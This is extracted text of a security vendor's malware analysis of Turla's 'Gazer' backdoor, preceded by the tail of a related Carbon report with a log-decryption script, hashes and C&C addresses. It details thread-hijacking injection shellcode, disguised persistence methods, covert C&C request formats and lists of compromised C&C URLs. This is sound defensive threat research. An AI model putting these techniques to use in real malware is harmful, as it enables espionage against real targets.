open(args.encrypt +
_encrypted
).write(data)
else:
ciphertext = open(args.decrypt,
).read()
while len(ciphertext) % 8 != 0:
ciphertext +=
\x00
data = cipher.decrypt(ciphertext)
open(args.decrypt +
_decrypted
).write(data)
if __name__ ==
__main__
main()
https://securelist.com/analysis/publications/65545/the-epic-turla-operation/
https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra
https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technicalreports/technical-report_apt_case_ruag.html
23/25
Table 2
Carbon sample hashes
SHA1 hash
7f3a60613a3bdb5f1f8616e6ca469d3b78b1b45b
a08b8371ead1919500a4759c2f46553620d5a9d9
4636dccac5acf1d95a474747bb7bcd9b1a506cc3
cbde204e7641830017bb84b89223131b2126bc46
1ad46547e3dc264f940bf62df455b26e65b0101f
a28164de29e51f154be12d163ce5818fceb69233
7c43f5df784bf50423620d8f1c96e43d8d9a9b28
7ce746bb988cb3b7e64f08174bdb02938555ea53
20393222d4eb1ba72a6536f7e67e139aadfa47fe
1dbfcb9005abb2c83ffa6a3127257a009612798c
2f7e335e092e04f3f4734b60c5345003d10aa15d
311f399c299741e80db8bec65bbf4b56109eedaf
fbc43636e3c9378162f3b9712cb6d87bd48ddbd3
554f59c1578f4ee77dbba6a23507401359a59f23
2227fd6fc9d669a9b66c59593533750477669557
87d718f2d6e46c53490c6a22de399c13f05336f0
1b233af41106d7915f6fa6fd1448b7f070b47eb3
851e538357598ed96f0123b47694e25c2d52552b
744b43d8c0fe8b217acf0494ad992df6d5191ed9
bcf52240cc7940185ce424224d39564257610340
777e2695ae408e1578a16991373144333732c3f6
56b5627debb93790fdbcc9ecbffc3260adeafbab
678d486e21b001deb58353ca0255e3e5678f9614
Table 3
C&C server addresses (hacked websites used as 1st level of proxies
C&C server address
soheylistore.ir:80:/modules/mod_feed/feed.php
tazohor.com:80:/wp-includes/feed-rss-comments.php
jucheafrica.com:80:/wp-includes/class-wp-edit.php
61paris.fr:80:/wp-includes/ms-set.php
24/25
C&C server address
doctorshand.org:80:/wp-content/about/
www.lasac.eu:80:/credit_payment/url/
Notes
25/25
Gazing at Gazer
Turla
s new second stage backdoor
August 2017
Gazing at Gazer
Turla
s new second stage backdoor
August 2017
Table of Content
Introduction
Summary
Similarities with other Turla tools
Custom encryption
Global Architecture
Loader
Logs
Working Directory
Orchestrator
Communication Module
Messages between components
Gazer versions
IoCs
Filenames
Registry keys
C&C URLs
Mutexes
Hashes
Appendices
Function names
Yara rules
List of Figures
Figure 1.
Turla author
s sense of humor
Figure 2.
Gazer architecture
Figure 3.
Message format
Figure 4.
Certificates used to sign the malware variants
List of Tables
Table 1.
Abstract Class Autorun
Table 2.
Abstract Class Queue
Table 3.
Abstract Class Storage
Table 4.
Abstract Class TListenerInterface
Table 5.
Abstract Class TAbstractTransport
Table 6.
Gazer sample hashes
Gazing at Gazer
Turla
s new second stage backdoor
Introduction
Herein we release our analysis of a previously undocumented backdoor that has been targeted
against embassies and consulates around the world leads us to attribute it, with high confidence,
to the Turla group. Turla is a notorious group that has been targeting governments, government
officials and diplomats for years. They are known to run watering hole and spearphishing campaigns
to better pinpoint their targets. Although this backdoor has been actively deployed since at least
2016, it has not been documented anywhere. Based on strings found in the samples we analyzed,
we have named this backdoor
Gazer
Recently, the Turla APT group has seen extensive news coverage surrounding its campaigns,
something we haven
t seen for a long time. The Intercept reported that there exists a 2011 presentation
by Canada
s Communication Security Establishment (CSE) outlining the errors made by the Turla
operators during their operations even though the tools they use are quite advanced. The codename
for Turla APT group in this presentation is MAKERSMARK. Gazer is, similar to its siblings in the Turla
family, using advanced methods to spy and persist on its targets. This whitepaper highlights
the campaigns in which Gazer was used and also contains a technical analysis of its functionalities.
Summary
Based on our research and telemetry on the different campaigns where Gazer was used,we believe
that Southeastern Europe as well as countries in the former Soviet Union Republichas recently
been the main target. The witnessed techniques, tactics and procedures (TTPs) are in-line with
what we usuallysee in Turla
s operation: a first stage backdoor, such as Skipper, likely delivered
through spearphishingfollowed by the appearance on the compromised system of a second
stage backdoor, Gazerin this case.
Although we could not find irrefutable evidence that this backdoor is truly another tool in Turla
arsenal, several clues lead us to believe that this is indeed the case. First, their targets are in line
with Turla
s traditional targets: Ministries of Foreign Affairs (MFAs) and embassies. Second, the modus
operandi of spearphishing, followed by a first stage backdoor and a second stage, stealthier backdoor
is what has been seen over and over again. Skipper, which has been linked to Turla in the past, was
found alongside Gazer in most cases we investigated. Finally, there are many similarities between
Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar.
As usual, the Turla APT group makes an extra effort to avoid detection by wiping files securely,
changing the strings and randomizing what could be simple markers through the different backdoor
versions. In the most recent version we have found, Gazer authors modified most of the strings
and inserted
video-game-related
sentences throughout the code. An example of such
a string is depicted in Figure 1.
Gazing at Gazer
Turla
s new second stage backdoor
Figure 1.
Turla author
s sense of humor
Similarities with other Turla tools
Gazer is written in C++ and shares several similarities with other malware from the Turla APT family.
Indeed, Gazer, Carbon and Kazuar can receive encrypted tasks from a C&C server, which can be executed
either by the infected machine or by another machine on the network. They all use an encrypted
container to store the malware
s components and configuration and they also log their actions
in a file.
The list of C&C servers is encrypted and embedded in Gazer
s PE resources. They are all compromised,
legitimate websites (that mostly use the WordPress CMS) that act as a first layer proxy. This is also
a common tactic for the Turla APT group.
Another interesting linkage is that one of the C&C servers embedded in a Gazer sample was known
to be used in a JScript backdoor documented by Kaspersky as Kopiluak.
Last but not least, these three malware families (Gazer, Carbon and Kazuar) have a similar list
of processes that may be employed as a target to inject the module used to communicate with the
C&C server embedded in the binary. The resource containing this list can change from one sample
to another, it is likely tailored to what is installed on the system (for example, on some samples,
the process name
safari.exe
can appear on the list).
Custom encryption
Gazer
s authors make extensive use of encryption. They don
t use the Windows Crypto API
and don
t seem to use any public library. It looks as if they are using their own library
for 3DES and RSA.
The RSA keys embedded in the resources contains the attacker
s public key which is used to encrypt
the data sent to the C&C server, and a private key to decrypt resources embedded in its binaries.
These keys are unique in each sample.
These resources are structured in the same way as RSA from OpenSSL, but these values (p, q, etc.)
are computed by the custom implementation of Gazer
s authors.
Gazing at Gazer
Turla
s new second stage backdoor
For 3DES, the IV and a static key are hardcoded and are the same in all samples. This 3DES key
is randomly generated and XORed with the static key. The random data used to XOR the static
key is prepended to the logfile header. This key is then used in the regular 3DES algorithm.
Global Architecture
In this section, we will describe in detail each component of Gazer.
GAZER LOADER
GAZER ORCHESTRATOR
rsrc 101
running within
explorer.exe
explorer.exe
Forward task
Send
task
s result
rsrc 102
Orchestrator
rsrc 101
GAZER ORCHESTRATOR
[...]
Injected into process
indicated in rsrc 101
running within
firefox.exe
(for example)
rsrc 102
Comm module
May forward task
Injected into a process that
legitimately communicate
over the internet.
(process list from rsrc 106)
Send tasks
results
Get new
tasks
Machines on the same
network (P2P)
C&C server
Figure 2.
Gazer architecture
Loader
The loader is the first component of the malware to be executed on the system. Two resources
are stored unencrypted in the binary:
101: the process name to inject the orchestrator into1
102: the orchestrator
The following mutex is created to ensure that only a single instance of the malware is running:
{531511FA-190D-5D85-8A4A-279F2F592CC7}
Named pipe generation
To establish a communication channel between Gazer components, a named pipe is initiated.
The named pipe is generated from this string:
\\\\.\\pipe\\Winsock2\\CatalogChangeListener-FFFF-F
Note that in all samples we have analyzed the process name is
explorer.exe
Gazing at Gazer
Turla
s new second stage backdoor
The pattern
FFFF-F
is replaced with values computed from the security identifier (SID) of the current
user and the current timestamp.
s take for example the current date as:
2017/04/24
and the SID:
S-1-5-21-848130773085987743-2510664113-1000
To generate the pattern at the end of the named pipe, some arithmetic is performed:
time = SystemTime.wDay * Systemtime.wMonth * SystemTime.wYear =
24 * 04 * 2017 = 0x2f460
xsid = (1 * 21 * 84813077 * 3085987743 * 2510664113 * 1000) &
0xFFFFFFFF = 0xefa252d8
((time >> 20) + (time & 0xFFF) + ((time >> 12) & 0xFFF)) % 0xFF =
0x93
((xsid >> 20) + (xsid & 0xFFF) + ((xsid >> 12) & 0xFFF)) % 0xFF =
0x13
((time * xsid >> 24) + (uint8_t)(time * xsid) + ((uint16_t)(time *
xsid) >> 8) + (uint8_t)(time * xsid >> 16)) % 0xf) = 0xa
In this case, the named pipe will be:
\\\\.\\pipe\\Winsock2\\CatalogChangeListener-9313-a
If the current user
s SID cannot be retrieved, the named pipe \\\\.\\pipe\\\Winsock2\\
CatalogChangeListener-FFFE-D will be used by default.
Code injection through thread hijacking
A not-so-common trick is used in order to inject the orchestrator into a remote process. Indeed,
a running thread from the remote process is hijacked in order to run shellcode that will execute
the communication module entry point.
The whole module and shellcode are copied into the remote process;
the function ZwQuerySystemInformation is used to retrieve the total number
of the running threads in the targeted process;
the following operations are attempted on each of those threads:
the thread is suspended with the OpenThread/SuspendThread functions;
the thread context is retrieved using GetThreadContext;
the context
s instruction pointer is saved and modified to point to the shellcode
(through SetThreadContext);
the thread is resumed using ResumeThread.
if one of the previous operations fails, the thread is resumed and the same actions
are attempted on another thread.
Gazing at Gazer
Turla
s new second stage backdoor
launcher:
push rax
sub rsp, 38h
movabs rax, 5D20092
; @ end of payload
mov qword ptr ss:[rsp+28], rax
; lpThreadId
mov qword ptr ss:[rsp+20], 0
; dwCreationFlags
xor r9d, r9d
; lpParameter
movabs r8, 5D20046
; lpStartAddress => @payload
xor edx, edx
; dwStackSize = 0
xor ecx, ecx
; lpThreadAttributes = NULL
call qword ptr ds:[CreateThread]
movabs rax, 90A7FACE90A7FACE
; replaced by the saved
instruction pointer from
thread context ;)
add rsp, 38h
xchg qword ptr ss:[rsp], rax
payload:
sub rsp, 28
movabs r8, 5D20096
mov edx, 1
movabs rcx, 4000000000000000
call qword ptr ds: [DllEntryPoint]
xor ecx, ecx
call ExitThread
int 3
xxxx; @DllEntryPoint
xxxx ; @CreateThread
xxxx; @ExitThread
xxxx
xxxx
xxxx
xxxx ; TID
The shellcode is just a loader that will execute the module entry point in a new thread.
Persistence
The loader sends binary data through the named pipe to the orchestrator. This blob contains:
a command ID (2): CMC_TAKE_LOADER_BODY
the loader path file
the loader PE
Once this message is received by the orchestrator, the loader is securely deleted by overwriting
the file content and deleted through the DeleteFile function.
Afterwards, the persistency is set up. The persistency information is retrieved from the resource
and stored in the Gazer storage. Among these data, there is a dword value that is used to choose
which persistency mode will be applied.
The resource 105 is structured in the following way:
a dword value representing the persistence mode
a dword value representing the size of the data
the persistence information
Gazing at Gazer
Turla
s new second stage backdoor
There are 6 different persistence modes.
0: ShellAutorun
Persistence is achieved through the Windows registry by setting the value
Shell
with
explorer.
exe, %malware_pathfile%
under the following key:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
1: HiddenTaskAutorun
It is very similar to the
TaskScheduler Autorun (4)
method described below. The main difference
is that the task is hidden from the user by using the TASK_FLAG_HIDDEN flag (set up via
the SetFlags method from the ITask interface).
2: ScreenSaverAutorun
In this mode, Gazer achieves persistency by setting up in the Windows registry the executable
file used for the screensaver.
Many values are created under the HKCU\Control Panel\Desktop registry key:
SCRNSAVE.exe with the malware executable path
ScreenSaveActive is set to
: enable the screensaver
ScreenSaverIsSecure is set to
: specifies that the screensaver is not password-protected
ScreenSaveTimeout is set to a value given in the resource. It specifies how long the system
remains idle before the screensaver (in this case: the malware) starts.
3: StartupAutorun
If the resource 105 begins with the dword value
, a LNK file will be created in the Start Menu.
The resource will also provide a description for the shortcut file, the path for the target
and the filename for the LNK.
The IShellLink interface is used to create the shell link.
4: TaskSchedulerAutorun
This method is used to achieve persistence by creating a scheduled task.
The task is created and set up through COM interfaces related to tasks (ITaskService,
ITaskSettings,
Some information such as the task name and its description is retrieved from the resource.
For example, in one of the sample
s resources, the persistency mode is set to 04 (TaskSchedulerAutorun)
with the persistency data:
%APPDATA%\Adobe\adobeup.exe Adobe Acrobat Reader Updater. This task was
generated by Adobe Systems, Inc to keep your Adobe Software up-to-data.
\Adobe\AcrobatReader.Adobe
In this example, a scheduled task will be created and set up thus:
Task name:
Adobe Acrobat Reader Updater
Executable:
%APPDATA%\Adobe\adobeup.exe
The orchestrator will copy the loader received through the named pipe to this location
Gazing at Gazer
Turla
s new second stage backdoor
Task description:
This task was generated by Adobe Systems, Inc to keep your
Adobe Software up-to-data
Task folder:
\Adobe\AcrobatReader.Adobe
Last but not least, the task is configured to be started by the task scheduler at any time after
its scheduled time has passed. The task will be triggered when the current user logs on.
5: LinkAutorun
This persistence method modifies existing LNK files to execute the malware through cmd.exe.
For each LNK file in the folder given in the resource, the icon and arguments are removed
and the path is set to
cmd.exe
with the argument set to:
/q /c start
&& start
In most of the samples we analyzed, the configuration file specified that the TaskSchedulerAutorun
persistence method should be used.
Logs
All three Gazer components log their actions into logfiles. They are encrypted with the same
algorithm: 3DES.
In some versions of Gazer, it is easy to retrieve these logfiles because their filenames are hardcoded
into the binaries:
%TEMP%\CVRG72B5.tmp.cvr: the logs from the loader
%TEMP%\CVRG1A6B.tmp.cvr: the logs from the orchestrator
%TEMP%\CVRG38D9.tmp.cvr: the logs from the communication module
Each logfile is structured in the following way:
[LOGSIZE][DECRYPTION_KEY][ENCRYPTED_LOG]
logsize: when this value (2 bytes) is subtracted from the magic value 0xf18b, it gives
the encrypted log size
decryption_key: when this 12 bytes blob is XORed with another hardcoded key of 12 bytes,
it gives the 3DES key that can be used to decrypt the log
encrypted_log: log encrypted with the 3DES algorithm in CBC mode
Once decrypted, each log entry is formatted in the following way:
|Hour:Min:Sec:Ms| [log ID] [log]
Gazing at Gazer
Turla
s new second stage backdoor
Here is an example with the decrypted orchestrator logfile:
|10:29:56:197|
[1556]
|10:29:56:197|
[1557]
******************[...]****************
|10:29:56:197|
[1558]
DATE: 25.05.2017
|10:29:56:197|
[1559]
PID=900 TID=2324
Heaps=32
C:\Windows\Explorer.EXE
|10:29:56:197|
[1565]
DLL_PROCESS_ATTACH
|10:29:56:197|
[1574]
4164
|10:29:58:197|
[0137]
==================[...]================
|10:29:58:197|
[0138]
Current thread = 2080
|10:29:58:197|
[0183]
Heap aff0000 [34]
|10:29:58:197|
[0189]
### PE STORAGE ###
|10:29:58:197|
[0215]
### PE CRYPTO ###
|10:29:58:197|
[0246]
### EXTERNAL STORAGE ###
|10:29:58:197|
[1688]
|10:29:58:197|
[0279]
Path = \HKCU\Software\Microsoft\
Windows\CurrentVersion\Explorer\ScreenSaver
|10:29:58:197|
[0190]
\HKCU\Software\Microsoft\Windows\
CurrentVersion\Explorer\ScreenSaver
|10:29:58:197|
[0338]
---FAILED
|10:29:58:197|
[0346]
Initializing standart reg storage...
|10:29:58:197|
[0190]
Software\Microsoft\Windows\
CurrentVersion\Explorer\ScreenSaver
|10:29:58:197|
[2605]
Storage is empty!
|10:29:58:197|
[0392]
### EXTERNAL CRYPTO ###
|10:29:59:666|
[1688]
|10:29:59:713|
[1473]
|10:29:59:760|
[1688]
|10:29:59:775|
[1473]
|10:29:59:775|
[1688]
|10:29:59:775|
[1473]
|10:29:59:791|
[1688]
|10:29:59:791|
[1473]
|10:29:59:806|
[1688]
|10:29:59:806|
[1473]
|10:29:59:806|
[0270]
08-00-27-90-05-2A
|10:29:59:806|
[0286]
_GETSID_METHOD_1_
|10:29:59:806|
[0425]
28 7 8 122
|10:29:59:806|
[0463]
S-1-5-21-84813077-30859877432510664113-1000
|10:29:59:806|
[0471]
|10:29:59:806|
[0787]
|10:29:59:806|
[1473]
|10:29:59:822|
[0514]
### QUEUES ###
|10:29:59:822|
[0370]
T Empty
|10:29:59:822|
[0482]
R Empty
|10:29:59:822|
[1754]
|10:29:59:822|
[1688]
|10:29:59:822|
[1473]
|10:29:59:838|
[0505]
R #4294967295 PR_100 TR_00000000
SZ_172 SC_0(50) --+EX_0
|10:29:59:838|
[0625]
### TRANSPORT ###
|10:29:59:838|
[0286]
_GETSID_METHOD_1_
|10:29:59:838|
[0425]
28 7 25 122
|10:29:59:838|
[0463]
S-1-5-21-84813077-30859877432510664113-1000
|10:29:59:838|
[0471]
|10:29:59:838|
[0165]
\\.\pipe\Winsock2\
CatalogChangeListener-2313-4
|10:29:59:838|
[0131]
PipeName = \\.\pipe\Winsock2\
CatalogChangeListener-2313-4
|10:29:59:838|
[0041]
true
[...]
Gazing at Gazer
Turla
s new second stage backdoor
Note that in older Gazer versions, the
log ID
was replaced by the name of the current function.
We believe that this log ID is an ID for the function where the log occurs.
Working Directory
Using the Windows Registry
All the files related to Gazer (except the logs) are stored encrypted within the registry. The orchestrator
resource
contains the root storage path (it will be designated %RootStoragePath% in the rest
of this paper). In every sample we examined, this resource pointed to the same storage path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ScreenSaver
If this resource is empty, the registry key above is used by default. Except for RSA keys, all the data
in the storage is encrypted2.
Several subdirectories (whose names are hardcoded in the binary) are created.
%RootStoragePath%{119D263D-68FC-1942-3CA3-46B23FA652A0}
Object ID: a unique ID to identify the victim
%RootStoragePath%{1DC12691-2B24-2265-435D-735D3B118A70}
Task Queue: linked list of tasks to be executed
%RootStoragePath%{28E74BDA-4327-31B0-17B9-56A66A818C1D}
Plugins
%RootStoragePath%{31AC34A1-2DE2-36AC-1F6E-86F43772841F}
Communication Module: the DLL that communicates with the C&C server
%RootStoragePath%{3CDC155D-398A-646E-1021-23047D9B4366}
Autorun: the persistency method
%RootStoragePath%{4A3130BD-2608-730F-31A7-86D16CE66100}
Local Transport Settings: the computers IPs that are on the same network
%RootStoragePath%{56594FEA-5774-746D-4496-6361266C40D0}
Last Connection: last connection time with the C&C server (structure SYSTEMTIME)
%RootStoragePath%{629336E3-58D6-633B-5182-576588CF702A}
RSA Private Key: generated on the fly; used to decrypt the data from Gazer storage.
%RootStoragePath%{6CEE6FE1-10A2-4C33-7E7F-855A51733C77}
Result Queue: linked list of the tasks results
%RootStoragePath%{81A03BF8-60AA-4A56-253C-449121D61CAF}
Inject Settings: the list of processes to use to try to inject the communications module
%RootStoragePath%{8E9810C5-3014-4678-27EE-3B7A7AC346AF}
C&C servers
See the
Gazer Resources
section for details
Gazing at Gazer
Turla
s new second stage backdoor
Using Alternate Data Streams
If it is not possible to access the registry, these configuration items are stored using alternate
data streams.
The function GetVolumeInformation is called to ensure that the volume
supports named
streams in order to use ADS.
The same GUIDs as above are used to hide the different data in an ADS for the file (hardcoded
in the binary):
%TEMP%\KB943729.log
For example, here is the full path to access the object ID:
%TEMP%\KB943729.log:{1DC12691-2B24-2265-435D-735D3B118A70}
Orchestrator
Gazer Resources
The Gazer-related files are stored in the orchestrator
s resources.
File format
There are a total of 11 resources (101 to 111) each structured in the following way:
[DATATYPE][SIZE][DATA][PADDING]
DATATYPE: A dword that specifies the type of data in the resource
0x0: raw data
0xFFFFFFFF: empty
0x4: undefined
0x1030001: strings array
0x1: binary
SIZE: the size of the data (without padding)
Encryption
Except for resources 101 and 102 which are RSA keys, every resource is compressed with BZip
and encrypted with 3DES.
[RSAEncryptedBlob][SignatureBlob][3DESBlob]
RSAEncryptedBlob: The first 1024 bits of the data is a blob that contains a 3DES key. This blob
is encrypted using RSA and can be decrypted using resource 101.
SignatureBlob: The second part of the data is a blob of 1024 bits containing the signature
of the last part of the data once decrypted.
3DESBlob: The last part is the effective data, which is encrypted with the 3DES key from
the first blob.
Each resource is decrypted on the fly; the signature is compared with the decrypted data to check
the integrity. Decrypted resources that pass this integrity check are encrypted with a new RSA key
generated randomly by the orchestrator code. The private key and the encrypted resource are then
stored in the registry under a specific GUID subkey.
Gazing at Gazer
Turla
s new second stage backdoor
Resources listing
101: RSA private key. It is used to decrypt the other resources.
102: an RSA public key.
103: empty
104: unknown
105: store the persistency information
106: the list of processes to use to try to inject the communications module
107: C&C communication DLL
108: C&C server list
109: Gazer working directory path
110: plugins list
111: local transport information
Task Execution
When a task is retrieved from the C&C, it is either executed by the infected machine or by another
computer on the same network through a P2P mechanism (in the same way this was done
in Carbon and Snake).
The task can be:
file upload
file download
configuration update
command execution
The result of the task is stored in a queue and forwarded to the module that communicates
with the C&C server when access to the Internet is available.
Classes Hierarchy
The malware is written in C++ and the RTTI that contains information about the objects used
in the code is not overwritten.
There are 5 abstract classes that have several implementations.
Table 1.
Abstract Class Autorun
Class Name
LinkAutorun
StartupAutorun
ShellAutorun
ScreenSaverAutorun
TaskSchedulerAutorun
HiddenTaskAutorun
Gazing at Gazer
Turla
s new second stage backdoor
Table 2.
Abstract Class Queue
Class Name
TaskQueue
ResultQueue
Table 3.
Abstract Class Storage
Class Name
ExeStorage
FSStorage
RegStorage
Table 4.
Abstract Class TListenerInterface
Class Name
LTMessageProcessing
CMessageProcessingSystem
Table 5.
Abstract Class TAbstractTransport
Class Name
LTNamedPipe
TNPTransport
Communication Module
The communication module is used to retrieve tasks from the C&C server and to dispatch them
to the orchestrator.
This library is injected into a process which can legitimately communicate over the Internet.
The injection library is the same as the one found in the loader to inject the orchestrator
into
explorer.exe
Communication Initialization
If a proxy server exists, it is retrieved and used by Gazer to make the HTTP requests. There are two
different methods used to retrieve this value, either by requesting the following registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
or through the function InternetQueryOption with the flag INTERNET_OPTION_PROXY if the proxy
server cannot be retrieved through the registry.
The system user agent is then set up:
the default value of the
HKCU\Software\Microsoft\Windows\Current Version\
Internet Settings\User Agent
key is retrieved;
Gazing at Gazer
Turla
s new second stage backdoor
the value keys under
HKLM\Software\Microsoft\Windows\Current Version\Internet
Settings\5.0\User Agent\Post Platform
are enumerated and those that contain
the sub-string
IEAK
are concatenated with the user agent string from the previous step;
in the case that no user agent was found in the registry, the hardcoded UA Mozilla/4.0
(compatible; MSIE 6.0) is used
Before attempting any contact with the C&C server, the internet connection is checked by trying
to reach the following servers one by one until one returns a HTTP status code 200:
update.microsoft.com
microsoft.com
windowsupdate.microsoft.com
yahoo.com
google.com
C&C server communication
The malware communicates with its C&C server to retrieve tasks (through HTTP GET requests)
and to send the tasks results (through HTTP POST requests).
Before sending a request to the C&C, the command CMC_GIVE_SETTINGS is sent to the orchestrator
through its communication channel (a named pipe, more on this in the next section). The message
(MSG) contained in the packet in this case is a single byte set by the orchestrator for the command
result status.
The orchestrator replies on the same channel with the settings retrieved from the working directory
with the object id, the list of the C&C servers and the last connection date.
A GET request is performed to retrieve a task from the C&C.
The parameters of the GET request are chosen from amongst a hardcoded list of keywords that does
not look suspicious. Their values are generated randomly in the charset [a-z0-9] with a random size
from a range given for each parameter:
id [6-12] (As with all other parameters, if this parameter is used in the request, it will have a random
value (of letters and digits) with a random size between 6 and 12 characters.)
hash [10-15]
session [10-15]
photo [6-10]
video [6-10]
album [6-10]
client [5-10]
key [5-10]
account [6-12]
member [6-12]
partners [5-10]
adm [6-12]
author [6-12]
Gazing at Gazer
Turla
s new second stage backdoor
contact [6-12]
content [6-12]
user [6-12]
Here are few examples of such requests:
xxx.php?album=2ildzq&key=hdr2a&partners=d2lic33f&session=nurvxd2x0z8bztz&video
=sg508tujm&photo=4d4idgkxxx.php?photo=he29zms5fc&user=hvbc2a&author=xvfj5r0q
9c&client=7mvvc&partners=t4mgmuy&adm=lo3r6v4xxx.php?member=ectwzo820&contact
=2qwi15&album=f1qzoxuef4&session=x0z8bztz8hrs65f&id=t3x0ftu9xxx.php?partners
=ha9hz9sn12&hash=5740kptk3acmu&album=uef4nm5d&session=dpeb67ip65f&member=arj6
x3ljjxxx.php?video=nfqsz570&client=28c7lu2&partners=818eguh70&contact=ibj3xch
&content=1udm9t799ixr&session=5fjjt61qred9uo
A timeout of 10 minutes is set for each request (send/receive/connect) through InternetSetOption.
Once the request is sent, the response is handled only if the returned HTTP status code is 404.
The content of the response is encrypted and can be decrypted with the private RSA key generated
by the orchestrator. The response body contains a blob of data and an MD5 hash of the data. The blob
is hashed and compared to the MD5 to ensure the integrity of the server
s response.
If the response size is 20 bytes (a blob of 4 bytes + the hash), there are no tasks to retrieve.
A command CMC_TAKE_TASK is sent to the orchestrator with the encrypted task received from
the C&C server and its size. The orchestrator will be in charge of executing the task and will send
the results to the communication module. Once the blob of the tasks results (encrypted by the
orchestrator) is received, it is sent to the C&C server through a POST request in the same way
that it was done for the GET request (using parameters with random values).
Messages between components
A global named pipe is used for the communication between the different components. The data
sent through this named pipe is formatted in the following way:
Datatype
Figure 3.
ID_CMD
Message format
DATATYPE: the same constants are used for the resources (check the File Format entry
in the
Resources section
ID_CMD: the command name (check below for a complete list)
MSG: the data to be sent
Here is a listing of the different commands:
CMC_TAKE_TASK (ID_CMD: 1)
When a task is retrieved by the C&C server module, it is sent to the orchestrator,
which stores the task in the task queue.
CMC_TAKE_LOADER_BODY (ID_CMD: 2)
Gazing at Gazer
Turla
s new second stage backdoor
Wipe Gazer
s original loader file, clean persistency and set up a copy of the loader
and its persistency according to one of the resources (check persistency part for details).
CMC_GIVE_RESULT (ID_CMD: 4)
When this message is received, the orchestrator will retrieve the task
s result from
the result queue, compress and encrypt it using the server
s public RSA key (the one
from the resource 102) and send the blob to the communication module which will send
the whole result to the server through a POST request.
CMC_GIVE_SETTINGS (ID_CMD: 5)
The communication module sends this message to the orchestrator to request
the information needed to contact the server (list of the servers to contact, the last
connection time and the victim ID).
CMC_TAKE_CONFIRM_RESULT (ID_CMD: 6)
When the communication module sends a task
s result to the server, a message is sent
to the orchestrator that will remove the task
s result from the queue.
CMC_TAKE_CAN_NOT_WORK (ID_CMD: 7)
When an operation has failed (for example, if the communication module cannot correctly
parse the data received from the orchestrator), this message is sent to the orchestrator
with the last error code. The error code will be added to the logfile.
CMC_TAKE_UNINSTALL (ID_CMD: 8)
Used to wipe a file from the disk.
CMC_TAKE_NOP (ID_CMD: 9)
No operation
CMC_NO_CONNECT_TO_GAZER (ID_CMD: 0xA)
This command is sent to the orchestrator when the communication module cannot
contact any of the servers. In this case, if a pending task
s results are in the queue,
they are stored encrypted in Gazer
s storage.
CMC_TAKE_LAST_CONNECTION (ID_CMD: 0xB)
This command is sent from the communication module to the orchestrator each time
a connection is established to the C&C server. It contains a structure SystemTime (filled
with the current system time). Once the message is received by the orchestrator,
the last connection date is stored compressed and encrypted in the Gazer storage
(either the registry or ADS).
CMC_GIVE_CACHE / CMC_TAKE_CACHE (ID_CMD: 0xC / 0xD)
Not implemented
Gazing at Gazer
Turla
s new second stage backdoor
Gazer versions
Four different versions have been identified.
In the first version, the function used to write logs has as its parameter the real function name
where the log occurs. There were also different methods used to inject code (the one documented
in this whitepaper and one based on window injection).
In a second version, the function names used as parameters are replaced by an ID and only one method
is used for code injection. Also, the string
NO OLD METHODS
appears in this part of the code.
Some samples from the first versions were signed with a valid certificate issued by Comodo for
Solid
Loop Ltd
. The compilation date appears to be 2002 but is likely to be faked because the certificate
was issued in 2015.
The latest versions are signed with a different certificate:
Ultimate Computer Support Ltd
Figure 4.
Certificates used to sign the malware variants
Some efforts have been made to obfuscate strings that can be used as IoCs. The mutex name and
the named pipe do not appear in cleartext anymore; they are now encoded with a XOR key. On the
previous versions, the logfile names were hardcoded in the binary. The function GetTempFileNameA
is now used to generate a random filename. The C&C server returns a 404 or 502 status code page,
whereas it was only a 404 in the previous versions.
In the latest versions compiled in 2017, the log messages are different (although they have the same
meaning). For example:
PE STORAGE
is replaced by
EXE SHELTER
PE CRYPTO
by
CIPHER
etc
Last but not least, the compilation timestamp seems not to be faked anymore.
In conclusion, Gazer is a very sophisticated piece of malware that has been used against different
targets in several countries around the world. Through the different versions we found and analyzed,
we can see that this malicious backdoor is still being actively developed and used by its creators.
Indicators of Compromise can also be found on github. For any inquiries, or to make sample submissions related
to the subject, contact us at: threatintel@eset.com.
Gazing at Gazer
Turla
s new second stage backdoor
IoCs
Filenames
%TEMP%\KB943729.log
%TEMP%\CVRG72B5.tmp.cvr
%TEMP%\CVRG1A6B.tmp.cvr
%TEMP%\CVRG38D9.tmp.cvr
%TEMP%\~DF1E06.tmp
%HOMEPATH%\ntuser.dat.LOG3
%HOMEPATH%\AppData\Local\Adobe\AdobeUpdater.exe
Registry keys
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ScreenSaver
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Explorer\ScreenSaver
C&C URLs
daybreakhealthcare.co.uk/wp-includes/themees.php
simplecreative.design/wp-content/plugins/calculated-fields-form/single.php
169.255.137.203/rss_0.php
outletpiumini.springwaterfeatures.com/wp-includes/pomo/settings.php
zerogov.com/wp-content/plugins.deactivate/paypal-donations/src/PaypalDonations/SimpleSubsribe.
ales.ball-mill.es/ckfinder/core/connector/php/php4/CommandHandler/CommandHandler.php
dyskurs.com.ua/wp-admin/includes/map-menu.php
warrixmalaysia.com.my/wp-content/plugins/jetpack/modules/contact-form/grunion-table-form.php
217.171.86.137/config.php
217.171.86.137/rss_0.php
shinestars-lifestyle.com/old_shinstar/includes/old/front_footer.old.php
www.aviasiya.com/murad.by/life/wp-content/plugins/wp-accounting/inc/pages/page-search.php
baby.greenweb.co.il/wp-content/themes/san-kloud/admin.php
soligro.com/wp-includes/pomo/db.php
giadinhvabe.net/wp-content/themes/viettemp/out/css/class.php
tekfordummies.com/wp-content/plugins/social-auto-poster/includes/libraries/delicious/Delicious.php
kennynguyen.esy.es/wp-content/plugins/wp-statistics/vendor/maxmind-db/reader/tests/MaxMind/Db/
test/Reader/BuildTest.php
sonneteck.com/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/licence/templates/panel/
activation/activation.php
chagiocaxuanson.esy.es/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/
ngglegacy/admin/templates/manage_gallery/gallery_preview_page_field.old.php
hotnews.16mb.com/wp-content/themes/twentysixteen/template-parts/content-header.php
zszinhyosz.pe.hu/wp-content/themes/twentyfourteen/page-templates/full-hight.php
weandcats.com/wp-content/plugins/broken-link-checker/modules/checkers/http-module.php
Mutexes
